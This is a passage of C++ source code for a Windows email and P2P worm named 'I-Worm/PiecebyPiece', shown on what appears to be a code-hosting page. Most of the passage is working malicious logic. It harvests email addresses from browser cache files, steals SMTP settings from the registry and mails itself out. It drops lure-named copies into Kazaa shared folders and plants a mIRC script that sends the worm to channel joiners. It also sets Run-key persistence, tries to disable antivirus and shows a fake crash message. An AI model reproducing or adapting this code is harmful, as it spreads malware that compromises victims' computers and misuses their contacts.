📄 29a-7.014
字号:
j=strlen(key2);
for (i=0;i<8;i++){
key2[j+i]=acc[i];
}
key2[j+i]=0;
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"SMTP Server",0,NULL,smtp,&smtplen);
RegCloseKey(hKey);
if (smtp[0]>44 && smtp[0]<123) { //if a valid serv. is found, replace the hard-coded one with
i=0; //the new one
while (smtp[i]!=0) {
server[i]=smtp[i]; //Now this is the SMTP server
i++;
}
server[i]=0;
//Get the e-mail
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen);
RegCloseKey(hKey);
if (eml[0]>44 && eml[0]<123) { //if a valid e-mail is found, replace the hard-coded one with
i=0; //the new one
while (eml[i]!=0) {
email[i]=eml[i]; //Now this is the "FROM:" e-mail
i++;
}
email[i]=0;
}
//Set a new "HELO" domain
i=strlen(email)-1;
j=0;
while (email[i]!='@') {
helo[j]=email[i];
j++;
i--;
}
}
helo[j]=0;
strrev(helo);
//end
}
//--------------------------------------FINDMAIL----------------------------------------------
void findmail(char file[MAX_PATH]) //Gets e-mail addresses from HTML files
{
int ik,j=0;
char lin[256],*start,ch[1];
fstream f(file,ios::in);
while (f.get(lin,256))
{
start=strstr(lin,"mailto:");
if (start!=0)
{
j=0;
c++;
ik=start-lin+7;
ch[1]=lin[ik];
while (ch[1]!=34 && ch[1]!=58 && ch[1]!=32 && ch[1]!=62 && ch[1]!=63)
{
emails[c][j]=ch[1];
j++;
ik++;
ch[1]=lin[ik];
}
emails[c][j]=0;
}
f.get();
}
f.close();
}
//--------------------------------------FINDFILES---------------------------------------------
void findfiles() { //Searches for .htm files in the temp. directories
WIN32_FIND_DATA f;
HANDLE hf;
int k=0;
char pth1[MAX_PATH],pth2[MAX_PATH],pth3[MAX_PATH],pth[MAX_PATH],path[MAX_PATH];
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\*");
hf=FindFirstFile(pth2,&f);
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
while (FindNextFile(hf,&f)!=0 && k<20) {
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
k++;
}
FindClose(hf);
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\");
strcat(pth2,pth1);
strcat(pth2,"\\*");
k=0;
hf=FindFirstFile(pth2,&f);
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
while (FindNextFile(hf,&f)!=0 && k<20) {
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
k++;
}
FindClose(hf);
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\");
strcat(pth2,pth1);
strcat(pth2,"\\");
strcat(pth2,pth3);
strcpy(pth,pth2);
strcat(pth,"\\");
strcat(pth2,"\\*.htm");
k=0;
hf=FindFirstFile(pth2,&f);
while (FindNextFile(hf,&f)!=0 && k<70) {
if (f.cFileName[0]!='.') {
strcpy(path,pth);
strcat(path,f.cFileName);
findmail(path);
}
k++;
}
FindClose(hf);
}
//--------------------------------------CONECT------------------------------------------------
int conect() { //Connects to a server using "Winsock"
// Start up Winsock
i=WSAStartup(version, &wsaData);
if (i!=0) {return(0);}
// Store information about the server
LPHOSTENT lpHostEntry;
lpHostEntry = gethostbyname(server);
if (lpHostEntry == NULL) {
WSACleanup();
connected=0;
return(0);
} else connected=1; //This means we're connected
//Get important data
if (err==0) { //If we didn't run this allready and got an error
findserver();
findfiles();
}
// Create the socket
theSocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (theSocket == INVALID_SOCKET) {
WSACleanup();
connected=0;
return(0);
}
SOCKADDR_IN saServer;
saServer.sin_family = AF_INET;
saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
saServer.sin_port = htons(25);
// Connect to the server
nRet = connect(theSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR) {
WSACleanup();
connected=0;
return(0);
}
nRet = recv(theSocket,Buf,sizeof(Buf),0);
if (nRet == SOCKET_ERROR) {
WSACleanup();
connected=0;
return(0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') {
sendmail();
}
//Close the connection
closesocket(theSocket);
// Shutdown Winsock
WSACleanup();
}
//--------------------------------------KAZAA-----------------------------------------------
void kazaa(char *file) { //Makes a copy in the Kazaa "Shared Folder"
int i;
char kaza[256],kfile[3][20];
unsigned char kpth[1024];
DWORD kpthlen=sizeof(kpth);
HKEY hKey;
//The filenames
strcpy(kfile[0],"\\mirc6.exe");
strcpy(kfile[1],"\\winamp3.exe");
strcpy(kfile[2],"\\wincrack.exe");
strcpy(kfile[3],"\\icq2002.exe");
//Get the path to Kazaa from the reg.
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen);
RegCloseKey(hKey);
if (kpth[0]>64 && kpth[0]<123) {
i=0;
while (kpth[i]!=0) {
kaza[i]=kpth[i];
i++;
}
kaza[i]=0;
}
GetSystemTime(&time);
srand(time.wSecond);
if (rand()%5==0) strcat(kaza,kfile[3]);
else if (rand()%4==0) strcat(kaza,kfile[2]);
else if (rand()%3==0) strcat(kaza,kfile[1]);
else if (rand()%2==0) strcat(kaza,kfile[0]);
CopyFile(file,kaza,FALSE);
}
//--------------------------------------INFECTWIN-------------------------------------------
void infectwin(char *file) { //Makes copies of the worm in %WinDir%\System\winsys*.exe
HKEY hKey;
unsigned char val[256];
char rnd[6];
int i=0;
strcpy(winbkup,windir);
strcat(winbkup,"\\System\\winsys");
GetSystemTime(&time);
srand(time.wSecond);
itoa(rand(),rnd,10);
strcat(winbkup,rnd);
strcat(winbkup,".exe");
//Copy file to Windows
CopyFile(file,winbkup,TRUE);
//Just in case there is no WinZip, use this path
strcpy(zippth,winbkup);
//Now make Windows run it at startup
while (winbkup[i]!=0) {
val[i]=winbkup[i];
i++;
}
val[i]=0;
RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
RegSetValueEx(hKey,"Windows task32 sys",0,REG_SZ,val,sizeof(val));
RegCloseKey(hKey);
}
//--------------------------------------MIRC--------------------------------------------------
void mirc() { //Creates a mIRC script
HKEY hKey;
unsigned char mircpth[1024];
char mirc[MAX_PATH];
int i=0;
DWORD mircpthlen=sizeof(mircpth);
//Get the path from our friend: the registry :)
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\mIRC",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"UninstallString",0,NULL,mircpth,&mircpthlen);
RegCloseKey(hKey);
i=1;
while (mircpth[i]!=0 && mircpth[i]!='.') {
mirc[i-1]=mircpth[i];
i++;
}
mirc[i-1]=0;
i=strlen(mirc);
while (mirc[i]!=92) {
mirc[i]=0;
i--;
}
strcat(mirc,"script.ini");
//Write a new script.ini
fstream f(mirc,ios::out);
f<<"[Script]"<<endl;
f<<"n0=ON 1:JOIN:#:{"<<endl;
f<<"n1=/dcc send $nick "<<zippth<<endl;
f<<"n2=}"<<endl;
f<<"n3=on 1:start:{"<<endl;
f<<"n4= /join #piecebypiece"<<endl;
f<<"n5=}"<<endl;
f.close();
}
//--------------------------------------ZIPIT-------------------------------------------------
void zipit(char *file) { //Zips the virus with a random name
HKEY hKey;
unsigned char zip[1024];
char zippath[MAX_PATH],param[MAX_PATH],rnd[6];
int i=0;
DWORD ziplen=sizeof(zip);
//Get the path from the registry
i=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hKey);
if (i==ERROR_SUCCESS) { //If WinZip is installed then zip the file
RegQueryValueEx(hKey,"",0,NULL,zip,&ziplen);
RegCloseKey(hKey);
i=0;
while (zip[i]!=0) {
zippath[i]=zip[i];
i++;
}
zippath[i]=0;
//Make a random filename for the .zip file
strcpy(zippth,windir);
strcat(zippth,"\\System\\win32sys");
GetSystemTime(&time);
srand(time.wSecond);
itoa(rand(),rnd,10);
strcat(zippth,rnd);
strcat(zippth,".zip");
//Zip it!
strcpy(param," -a -r ");
strcat(param,zippth);
strcat(param," ");
strcat(param,file);
ShellExecute(hwnd,"open",zippath,param,NULL,SW_HIDE);
} else strcpy(zippth,file); //Else just use the executable file for mIRC
}
//--------------------------------------TIMERPROC---------------------------------------------
VOID CALLBACK TimerProc(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime) {
if (sending==0) { //Check for a connection if a mail is not under delivery
conect();
if (err!=0) { //if the server used encountered an error, try using the hard-coded serv.
strcpy(server,"smtp.barrysworld.com");
strcpy(email,"john@barrysworld.com");
strcpy(helo,"barrysworld.com");
conect();
}
if (connected==1) KillTimer(hwnd,tim); //Don't need to check for it again, but keep resident
}
}
//--------------------------------------PAYLOAD-----------------------------------------------
void payload() { //Every virus MUST have a payload ;)
MessageBox(NULL,"\"Cause nothing ever lasts forever\nWe're like flowers in this vase, together\nYou and me, it's pulling me down\nTearing my down, piece by piece\nAnd you can't see\nThat's it's like a disease\nKilling me now, it's so hard to breathe\"\n\t-Feeder <Piece by Piece>","I-Worm/PiecebyPiece",MB_OK+MB_SYSTEMMODAL);
}
//--------------------------------------------------------------------------------------------
//Main function
//--------------------------------------------------------------------------------------------
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){
WNDCLASSEX wndc;
MSG msg;
HKEY hKey;
unsigned char buf[1024],inf[]="yes";
DWORD buflen=sizeof(buf);
int first=0;
//Create a window
wndc.cbClsExtra = 0;
wndc.cbSize = sizeof(wndc);
wndc.cbWndExtra = 0;
wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH);
wndc.hCursor = LoadCursor(NULL,IDC_ARROW);
wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION);
wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION);
wndc.hInstance = hInstance;
wndc.lpfnWndProc = WndProc;
wndc.lpszClassName = "ClassName";
wndc.lpszMenuName = NULL;
wndc.style = CS_HREDRAW|CS_VREDRAW;
RegisterClassEx(&wndc);
hwnd =CreateWindow("ClassName","NEWWIN",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL);
UpdateWindow(hwnd);
//Hide the window
ShowWindow(hwnd,SW_HIDE);
//Get the filename and disable (if possible) any AVs
GetWindowThreadProcessId(hwnd,&ProcessId);
processes();
GetWindowsDirectory (windir, sizeof (windir)); //Get the Windir
//Check if the comp. was infected before
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\RedCell",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"infected",0,NULL,buf,&buflen);
RegCloseKey(hKey);
if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s')
{
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\RedCell",&hKey);
//Create a key in the registry to mark the PC as infected
RegSetValueEx(hKey,"infected",0,REG_SZ,inf,sizeof(inf));
RegCloseKey(hKey);
//----INFECT COMPUTER----
infectwin(filename);
kazaa(filename);
zipit(winbkup);
mirc();
base64(filename);
conect();
first=1;
MessageBox(hwnd,"This program has performed an illegal operation","Error",MB_OK+MB_ICONSTOP);
}
base64(filename);
GetSystemTime(&time);
if (time.wDay==15 && time.wMonth==9) payload(); //Activate payload when school starts (15 sept. in Romania)
if (first==0) {
base64(filename); //Write a "base64" encoded file every time (just in case)
conect(); //Try to connect
if (err!=0) { //If the server found in the reg. got an error, try using the hard-coded serv.
strcpy(server,"smtp.barrysworld.com");
strcpy(email,"john@barrysworld.com");
strcpy(helo,"barrysworld.com");
conect();
}
}
if (connected==0) SetTimer(hwnd,tim,50000,TimerProc); //Go resident and check for a connection every 50 secs.
while(GetMessage(&msg,NULL,0,0)) { //Stuff... ;-)
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
//end of main()
}
//--------------------------------------WNDPROC----------------------------------------------
LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) {
HDC hdc;
PAINTSTRUCT ps;
switch(iMsg){
case WM_PAINT:
hdc = BeginPaint(hwnd,&ps);
EndPaint(hwnd,&ps);
return 0;
case WM_DESTROY:
PostQuitMessage(0);
return 0;
}
return DefWindowProc(hwnd,iMsg,wParam,lParam);
}
//That's all folks! e-mail to: MI_pirat@yahoo.com , web: www.virus.isfunny.com || www.red-cell.tk
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -